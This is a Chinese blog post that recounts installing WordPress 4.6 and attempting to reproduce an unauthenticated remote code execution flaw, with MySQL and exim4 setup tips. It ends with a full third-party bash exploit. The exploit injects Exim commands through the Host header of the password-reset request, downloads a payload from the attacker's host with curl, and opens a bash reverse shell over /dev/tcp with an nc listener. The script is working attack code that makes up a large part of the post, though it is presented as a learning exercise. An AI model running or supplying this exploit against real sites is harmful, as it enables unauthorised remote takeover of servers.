<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">



  <meta name="description" content="Wordpress安装及4.6漏洞问题"/>




  <meta name="keywords" content="wordpress, poc, 八一" />



  <meta name="baidu-site-verification" content="HhUstaSjr0" />



  <meta name="google-site-verification" content="UA-102975942-1" />






  <link rel="alternate" href="/atom.xml" title="八一">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0" />



<link rel="canonical" href="https://bay1.top/2017/05/06/Wordpress安装及4.6漏洞问题/"/>


<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.6.0" />
<link rel="stylesheet" type="text/css" href="/css/prettify.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/css/sons-of-obsidian.css" media="screen" />



  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />




  
  <script id="baidu_analytics">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?9a885cc9fb6cd7bcef579deb8efe8a70";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>



  <script id="google_analytics">
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

        ga('create', 'UA-102975942-1', 'auto');
        ga('send', 'pageview');
  </script>










    <title> Wordpress安装及4.6漏洞问题 - 八一 </title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">八一</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    
      <a href="/archives">
        <li class="mobile-menu-item">
          
          
            文章
          
        </li>
      </a>
    
      <a href="/tags">
        <li class="mobile-menu-item">
          
          
            标签
          
        </li>
      </a>
    
      <a href="/about">
        <li class="mobile-menu-item">
          
          
            关于/友链
          
        </li>
      </a>
    
      <a href="/search">
        <li class="mobile-menu-item">
          
          
            站内搜索
          
        </li>
      </a>
    
  </ul>
</nav>

    <div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">八一</a>
</div>

<nav class="site-navbar">
  
    <ul id="menu" class="menu">
      
        <li class="menu-item">
          <a class="menu-item-link" href="/archives">
            
            
              文章
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/tags">
            
            
              标签
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/about">
            
            
              关于/友链
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/search">
            
            
              站内搜索
            
          </a>
        </li>
      
    </ul>
  
</nav>

      </header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          Wordpress安装及4.6漏洞问题
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2017-05-06
        </span>
        
        
        
      </div>
    </header>

    
    
  <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#wordpress4-6安装"><span class="toc-text">wordpress4.6安装</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#wordpress安装包解压"><span class="toc-text">wordpress安装包解压</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mysql数据库不能连接-1"><span class="toc-text">mysql数据库不能连接-1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mysql数据库不能连接-2"><span class="toc-text">mysql数据库不能连接-2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#不能更换主题和插件"><span class="toc-text">不能更换主题和插件</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#poc的利用"><span class="toc-text">poc的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#poc出现报错"><span class="toc-text">poc出现报错</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#poc修改"><span class="toc-text">poc修改</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#最后附上歪果仁作者的poc"><span class="toc-text">最后附上歪果仁作者的poc</span></a></li></ol>
    </div>
  </div>


    <div class="post-content">
      
        <p>感觉在学校的日子每天都是复习备考度过。。。这么多考试，还要隔几天考一门！<a id="more"></a>但是在曝出wordpress4.6漏洞之后，<br>也想体验一把复现的成就感，但是。。。这个poc条件很苛刻的，加上自己又很菜。。。我依旧没有成功，<br>这里主要写复现时遇到的问题orz。。。。。</p>
<h2 id="wordpress4-6安装"><a href="#wordpress4-6安装" class="headerlink" title="wordpress4.6安装"></a>wordpress4.6安装</h2><blockquote>
<p>我以前第一个博客就是wordpress搭建的，所以也算轻车熟路了吧，具体的操作网上一堆教程<br>这里是4.6的安装包<a href="https://wordpress.org/wordpress-4.6.zip" target="_blank" rel="noopener">WordPress4.6.zip</a><br>下面就说一下安装可能遇到的问题。</p>
</blockquote>
<h3 id="wordpress安装包解压"><a href="#wordpress安装包解压" class="headerlink" title="wordpress安装包解压"></a>wordpress安装包解压</h3><blockquote>
<p>如果解压之后再拖进vps是比较慢的，这时候你可以上传压缩包，然后解压<br>我们有时候想解压到具体目录，比如：/www/wwwroot/<a href="http://www.flywinky.info/" target="_blank" rel="noopener">www.flywinky.info/</a><br>可以这样操作<span style="color: red;">unzip xx.zip -d /www/wwwroot/<a href="http://www.flywinky.info/" target="_blank" rel="noopener">www.flywinky.info/</a></span> </p>
</blockquote>
<h3 id="mysql数据库不能连接-1"><a href="#mysql数据库不能连接-1" class="headerlink" title="mysql数据库不能连接-1"></a>mysql数据库不能连接-1</h3><blockquote>
<p>我并不知道这件事为什么每次我搭建的时候都会发生。<br>如果他说是账户名和密码错误的话，可以进行下面的操作</p>
</blockquote>
<p><strong>首先停止Mysql</strong></p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo /usr/<span class="built_in">local</span>/mysql/support-<span class="built_in">files</span>/mysql.server <span class="built_in">stop</span></span><br></pre></td></tr></table></figure>
<p><strong>以安全模式启动</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo mysqld_safe --skip-grant-tables</span><br></pre></td></tr></table></figure>
<p><strong>以没有密码登录mysql</strong></p>
<p><span style="color: red;">首先你需要打开另一个shell，进行下面的操作</span><br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo mysqld_safe --skip-grant-tables</span><br><span class="line">mysql&gt; UPDATE mysql.user SET Password=PASSWORD(<span class="string">'你的新密码'</span>) WHERE User=<span class="string">'用户名'</span>;</span><br></pre></td></tr></table></figure></p>
<p><strong>重启Mysql</strong></p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo /usr/<span class="built_in">local</span>/mysql/support-<span class="built_in">files</span>/mysql.server <span class="built_in">start</span></span><br></pre></td></tr></table></figure>
<h3 id="mysql数据库不能连接-2"><a href="#mysql数据库不能连接-2" class="headerlink" title="mysql数据库不能连接-2"></a>mysql数据库不能连接-2</h3><blockquote>
<p>即使重建密码，有时候也可能会出现你不知道自己到底建了什么数据库名。。。。<br>wordpress搭建的时候需要填写数据库名，这时候可以在shell端进行下面的操作查询<br><strong>连接mysql</strong></p>
</blockquote>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -u root -ppassword</span><br></pre></td></tr></table></figure>
<p>这里你可能遇到下图的问题，这是因为<span style="color: red;">“-p”和“password”之间没有空格</span><br><img src="https://s1.ax1x.com/2018/01/01/pSfxpD.png" alt="WordPress4.6"></p>
<p><strong>查看数据库名</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show databases;</span><br></pre></td></tr></table></figure>
<p>PS:<a href="http://www.cnblogs.com/zhangzhu/archive/2013/07/04/3172486.html" target="_blank" rel="noopener">其他的一些数据库命令</a></p>
<h3 id="不能更换主题和插件"><a href="#不能更换主题和插件" class="headerlink" title="不能更换主题和插件"></a>不能更换主题和插件</h3><blockquote>
<p>后台安装插件或主题都提示需要输入FTP信息<br>出现这个问题，是因为文件目录权限问题,登录VPS</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chmod -R <span class="number">755</span> /home/wwwroot</span><br><span class="line">chown -R www /home/wwwroot</span><br></pre></td></tr></table></figure>
<h2 id="poc的利用"><a href="#poc的利用" class="headerlink" title="poc的利用"></a>poc的利用</h2><h3 id="poc出现报错"><a href="#poc出现报错" class="headerlink" title="poc出现报错"></a>poc出现报错</h3><blockquote>
<p>如下图，这里是因为windows里，编辑会存在换行\r,linux报错</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfOk6.png" alt="wordpress4.6-2"></p>
<blockquote>
<p>用正则表达式进行去除’\r’，或者用下面的解决：</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">yum install dos2unix</span><br><span class="line">dos2unix **.sh</span><br></pre></td></tr></table></figure>
<h3 id="poc修改"><a href="#poc修改" class="headerlink" title="poc修改"></a>poc修改</h3><blockquote>
<p>首先是host地址修改为靶机ip<br>然后user_login=admin,这里的admin一定要写成靶机里存在的用户名<br>还有就是靶机必须要安装exim4</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install exim4</span><br></pre></td></tr></table></figure>
<blockquote>
<p>用下面的命令进行配置，第一项选择第一个“internet site; mail is sent and received directly using SMTP”<br>然后一路默认就行了</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dpkg-reconfigure exim4-config</span><br></pre></td></tr></table></figure>
<p>PS:<a href="http://www.junerik.com/?p=237" target="_blank" rel="noopener">安装exim4</a></p>
<h2 id="最后附上歪果仁作者的poc"><a href="#最后附上歪果仁作者的poc" class="headerlink" title="最后附上歪果仁作者的poc"></a>最后附上歪果仁作者的poc</h2><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line">rev_host=<span class="string">"192.168.57.1"</span> <span class="comment">##1</span></span><br><span class="line">   <span class="keyword">function</span> <span class="function"><span class="title">prep_host_header</span></span>() &#123;</span><br><span class="line">     cmd=<span class="string">"<span class="variable">$1</span>"</span></span><br><span class="line">     rce_cmd=<span class="string">"\$&#123;run&#123;<span class="variable">$cmd</span>&#125;&#125;"</span>;</span><br><span class="line">     <span class="comment">## replace / with $&#123;substr&#123;0&#125;&#123;1&#125;&#123;$spool_directory&#125;&#125;</span></span><br><span class="line">     <span class="comment">##sed 's^/^$&#123;substr&#123;0&#125;&#123;1&#125;&#123;$spool_directory&#125;&#125;^g'</span></span><br><span class="line">     rce_cmd=<span class="string">"`echo <span class="variable">$rce_cmd</span> | sed 's^/^\$&#123;substr&#123;0&#125;&#123;1&#125;&#123;\$spool_directory&#125;&#125;^g'`"</span></span><br><span class="line">     <span class="comment">## replace ' ' (space) with</span></span><br><span class="line">     <span class="comment">##sed 's^ ^$&#123;substr&#123;10&#125;&#123;1&#125;&#123;$tod_log&#125;&#125;$^g'</span></span><br><span class="line">     rce_cmd=<span class="string">"`echo <span class="variable">$rce_cmd</span> | sed 's^ ^\$&#123;substr&#123;10&#125;&#123;1&#125;&#123;\$tod_log&#125;&#125;^g'`"</span></span><br><span class="line">     <span class="comment">##return "target(any -froot@localhost -be $rce_cmd null)"</span></span><br><span class="line">     host_header=<span class="string">"target(any -froot@localhost -be <span class="variable">$rce_cmd</span> null)"</span></span><br><span class="line">     <span class="built_in">return</span> 0</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="comment">##cat exploitbox.ans</span></span><br><span class="line">   intro=<span class="string">"</span></span><br><span class="line"><span class="string">   DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r</span></span><br><span class="line"><span class="string">   bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f</span></span><br><span class="line"><span class="string">   G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c</span></span><br><span class="line"><span class="string">   G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg</span></span><br><span class="line"><span class="string">   IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f</span></span><br><span class="line"><span class="string">   IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f</span></span><br><span class="line"><span class="string">   X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6</span></span><br><span class="line"><span class="string">   b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb</span></span><br><span class="line"><span class="string">   NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N</span></span><br><span class="line"><span class="string">   TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1</span></span><br><span class="line"><span class="string">   QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz</span></span><br><span class="line"><span class="string">   NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g</span></span><br><span class="line"><span class="string">   G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54</span></span><br><span class="line"><span class="string">   eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb</span></span><br><span class="line"><span class="string">   WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO</span></span><br><span class="line"><span class="string">   TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg</span></span><br><span class="line"><span class="string">   ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb</span></span><br><span class="line"><span class="string">   MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD</span></span><br><span class="line"><span class="string">   G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob</span></span><br><span class="line"><span class="string">   WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz</span></span><br><span class="line"><span class="string">   NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb</span></span><br><span class="line"><span class="string">   MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f</span></span><br><span class="line"><span class="string">   X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4</span></span><br><span class="line"><span class="string">   bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"</span></span><br><span class="line">   intro2=<span class="string">"</span></span><br><span class="line"><span class="string">   ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09</span></span><br><span class="line"><span class="string">   fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb</span></span><br><span class="line"><span class="string">   MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg</span></span><br><span class="line"><span class="string">   ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE</span></span><br><span class="line"><span class="string">   aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09</span></span><br><span class="line"><span class="string">   fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg</span></span><br><span class="line"><span class="string">   ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh</span></span><br><span class="line"><span class="string">   bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt</span></span><br><span class="line"><span class="string">   ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt</span></span><br><span class="line"><span class="string">   ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp</span></span><br><span class="line"><span class="string">   bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1</span></span><br><span class="line"><span class="string">   cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="</span></span><br><span class="line">   <span class="built_in">echo</span> <span class="string">"<span class="variable">$intro</span>"</span>  | base64 -d</span><br><span class="line">   <span class="built_in">echo</span> <span class="string">"<span class="variable">$intro2</span>"</span> | base64 -d</span><br><span class="line">   <span class="keyword">if</span> [ <span class="string">"<span class="variable">$#</span>#"</span> -ne 1 ]; <span class="keyword">then</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"Usage:\n<span class="variable">$0</span> target-wordpress-url\n"</span></span><br><span class="line">   <span class="built_in">exit</span> 1</span><br><span class="line">   <span class="keyword">fi</span></span><br><span class="line">   target=<span class="string">"<span class="variable">$1</span>"</span></span><br><span class="line">   <span class="built_in">echo</span> -ne <span class="string">"\e[91m[*]\033[0m"</span></span><br><span class="line">   <span class="built_in">read</span> -p <span class="string">" Sure you want to get a shell on the target '<span class="variable">$target</span>' ? [y/N] "</span> choice</span><br><span class="line">   <span class="built_in">echo</span></span><br><span class="line">   <span class="keyword">if</span> [ <span class="string">"<span class="variable">$choice</span>"</span> == <span class="string">"y"</span> ]; <span class="keyword">then</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"\e[92m[+]\033[0m Connected to the target"</span></span><br><span class="line">   <span class="comment">## Serve payload/bash script on :80</span></span><br><span class="line">   RCE_exec_cmd=<span class="string">"(sleep 3s &amp;&amp; nohup bash -i &gt;/dev/tcp/<span class="variable">$rev_host</span>/1337 0&lt;&amp;1 2&gt;&amp;1) &amp;"</span></span><br><span class="line">   <span class="built_in">echo</span> <span class="string">"<span class="variable">$RCE_exec_cmd</span>"</span> &gt; rce.txt</span><br><span class="line">   python -mSimpleHTTPServer 80 2&gt;/dev/null &gt;&amp;2 &amp;</span><br><span class="line">   hpid=$!</span><br><span class="line">   <span class="comment">## Save payload on the target in /tmp/rce</span></span><br><span class="line">   cmd=<span class="string">"/usr/bin/curl -o/tmp/rce <span class="variable">$rev_host</span>/rce.txt"</span></span><br><span class="line">   prep_host_header <span class="string">"<span class="variable">$cmd</span>"</span></span><br><span class="line">   curl -H<span class="string">"Host: <span class="variable">$host_header</span>"</span> -s -d <span class="string">'user_login=admin&amp;wp-submit=Get+New+Password'</span> <span class="variable">$target</span>/wp-login.php? action=lostpassword <span class="comment">##2</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"\n\e[92m[+]\e[0m Payload sent successfully"</span></span><br><span class="line">   <span class="comment">## Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce</span></span><br><span class="line">   cmd=<span class="string">"/bin/bash /tmp/rce"</span></span><br><span class="line">   prep_host_header <span class="string">"<span class="variable">$cmd</span>"</span></span><br><span class="line">   curl -H<span class="string">"Host: <span class="variable">$host_header</span>"</span> -d <span class="string">'user_login=admin&amp;wp-submit=Get+New+Password'</span> <span class="variable">$target</span>/wp-login.php?action=lostpassword &amp; <span class="comment">##3</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"\n\e[92m[+]\033[0m Payload executed!"</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"</span></span><br><span class="line">   nc -vv -l 1337</span><br><span class="line">   <span class="built_in">echo</span></span><br><span class="line">   <span class="keyword">else</span></span><br><span class="line">   <span class="built_in">echo</span> -e <span class="string">"\e[92m[+]\033[0m Responsible choice ;)</span></span><br><span class="line"><span class="string"> Exiting.\n"</span></span><br><span class="line">   <span class="built_in">exit</span> 0</span><br><span class="line">   <span class="keyword">fi</span></span><br><span class="line">   <span class="built_in">echo</span> <span class="string">"Exiting..."</span></span><br><span class="line">   <span class="built_in">exit</span> 0</span><br></pre></td></tr></table></figure>
<p>PS:<a href="https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html" target="_blank" rel="noopener">漏洞利用详情（扶墙）</a><br><a href="https://www.youtube.com/watch?v=ZFt_S5pQPX0" target="_blank" rel="noopener">POC演示</a></p>

      
    </div>

    
      
      



      
      
    

    
      <footer class="post-footer">
        
          <div class="post-tags">
            
              <a href="/tags/wordpress/">wordpress</a>
            
              <a href="/tags/poc/">poc</a>
            
          </div>
        
        
        
  <nav class="post-nav">
    
      <a class="prev" href="/2017/05/09/SSCTF2017部分WP/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">SSCTF2017部分WP</span>
        <span class="prev-text nav-mobile">上一篇</span>
      </a>
    
    
      <a class="next" href="/2017/04/29/天朝挖煤的题已经不会做了。。/">
        <span class="next-text nav-default">天朝挖煤的题已经不会做了。。</span>
        <span class="prev-text nav-mobile">下一篇</span>
        <i class="iconfont icon-right"></i>
      </a>
    
  </nav>

      </footer>
    

  </article>


          </div>
          
  <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div> 
    </div>
  </div>


        </div>
      </main>

      <footer id="footer" class="footer">

  <div class="social-links">
    
      
        
          <a href="https://github.com/bay1" class="iconfont icon-github" title="github"></a>
        
      
    
      
        
          <a href="http://weibo.com/3190704711/profile?topnav=1&wvr=6&is_all=1" class="iconfont icon-weibo" title="weibo"></a>
        
      
    
      
    
      
    
      
    
    
    
  </div>


<div class="copyright">
  <span class="copyright-year">
    
    &copy; 
     
      2016 - 
    
    2018
    <span class="author">bay1</span>
  </span>
</div>
      </footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div>

    
  
  <script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://bay1.top/2017/05/06/Wordpress安装及4.6漏洞问题/';
        this.page.identifier = '2017/05/06/Wordpress安装及4.6漏洞问题/';
        this.page.title = 'Wordpress安装及4.6漏洞问题';
    };
    (function() {
    var d = document, s = d.createElement('script');

    s.src = '//https-blog-flywinky-top-1.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();  
  </script>



    
  





  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  
    <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  

  
    <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  


    <script type="text/javascript" src="/js/src/even.js?v=2.6.0"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=2.6.0"></script>
<script src="/js/prettify.js"></script>
<script type="text/javascript">
$(document).ready(function(){
 $('pre').addClass('prettyprint');
   prettyPrint();
 })
</script>
  </body>
</html>
